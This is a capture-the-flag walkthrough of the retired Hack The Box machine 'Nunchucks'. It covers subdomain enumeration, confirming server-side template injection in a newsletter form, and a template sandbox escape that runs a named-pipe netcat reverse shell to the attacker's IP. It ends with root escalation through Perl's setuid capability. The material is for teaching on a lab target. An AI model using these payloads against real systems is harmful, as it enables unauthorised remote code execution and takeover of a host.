Name: Nunchucks
Release Date: 28 Oct 2021
Retire Date: 02 Nov 2021
OS: Linux
Base Points: Easy - Retired [0]
Rated Difficulty:
Radar Graph:
HTB-Bot 00 days, 02 hours, 00 mins, 00 seconds
HTB-Bot 00 days, 02 hours, 00 mins, 00 seconds
Creator: TheCyberGeek
Pentest Workshop PDF: Nunchucks.pdf

Again, we start with sudo /home/kali/AutoRecon/src/autorecon/

Sidenote: Newer versions of Kali that do not use root by default require sudo whenever checking UDP ports.

We have ports SSH TCP 22, HTTP TCP 80, and HTTPS TCP 443 to deal with.  Navigating to is "Unable to Connect".  Navigating to pulls up a sales page. Looking at the autorecon output for TCP 80, we see that there's a statement "Did not follow the redirect to http://nunchucks.htb.  This means we need to add it to /etc/hosts using:


vi /etc/hosts nunchucks.htb


Notice, the domain name redirects to HTTPS and shows us the exact same page.  Fire up GoBuster and check a look at results:


gobuster vhost -u https://nunchucks.htb -k -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t50 -o nunchucks.out  

└─$ gobuster vhost -u https://nunchucks.htb -k -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t50 -o nunchucks.out    
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
[+] Url:          https://nunchucks.htb
[+] Method:       GET
[+] Threads:      50
[+] Wordlist:     /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] User Agent:   gobuster/3.1.0
[+] Timeout:      10s
2022/01/22 02:36:56 Starting gobuster in VHOST enumeration mode
Found: store.nunchucks.htb (Status: 200) [Size: 4029]
Found: Store.nunchucks.htb (Status: 200) [Size: 4029]
2022/01/22 03:21:09 Finished

Notice that we used "vhost" instead of "dir" in the Gobuster command. Dir will find directories, vhost finds sub-domains. We found the "store".nunchucks.htb sub-domain. We will need to add the sub-domain to our /etc/hosts file the same way we did above for nunchucks.htb.  

There's no store yet, but a method to sign up for a newsletter. Depending on input validation on this site (and a myriad of other things), we can try different Web App Attack methods. One of those methods is an Server-Side Template Injection (SSTI) attack. To check for this type of attack, we need to input something that uses 7 * 7 = 49 in it. For more SSTI detection methods, check out HackTricks here. Our email address to enter should be {{7*7}}@nunchicks.htb and then capture the response in Burpsuite to confirm the SSTI. In this particular case, we don't "need" to use Burpsuite because the response shows the email address on the page itself to be 49@nunchucks.htb, but it's good practice to use Burp in case the address doesn't show on the response page.

Since we did get the "49" response, we have confirmed that the site is vulnerable to SSTI attacks. As simple Google search for Nunchucks Template Injection provides us with a "payload" to escape the sandboxing by using "range.constructor". With that, we can build an injection to make a reverse shell to out netcat listener:


On Attacking Machine:

nc -lvnp 1337


Send the POST to /api/submit to Repeater:

{{range.constructor(\"return global.process.mainModule.require('child_process').execSync('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <YOUR TUN0 IP> 1337 >/tmp/f')\")()}}

We have a foothold as david. We can upgrade our shell to TTY using:


python3 -c 'import pty; pty.spawn("/bin/bash")'


Grab the user.txt flag and begin our privesc enumeration (LinPEAS and/or LinEnum).


david@nunchucks:~$ cat user.txt                                                                                           
cat user.txt                                                                                                              


LinEnum shows POSIX/SETUID capabilities on /usr/bin/perl. This is another GTFOBins box. I love GTFOBins. They are so fun to play with.

All we need to do is create a simple Perl script that bypasses AppArmor (annoying thing that it is) and we should have a shell as root. 



use POSIX qw(setuid);


exec "/bin/bash";


I like to create the script on my Attacking box and wget'ting it to the Victim machine. Vim tends to work very weird on reverse shells.

root@nunchucks:~# cat /root/root.txt
cat /root/root.txt


With that, we are root! Grab the flag and we've completed another box! Congrats!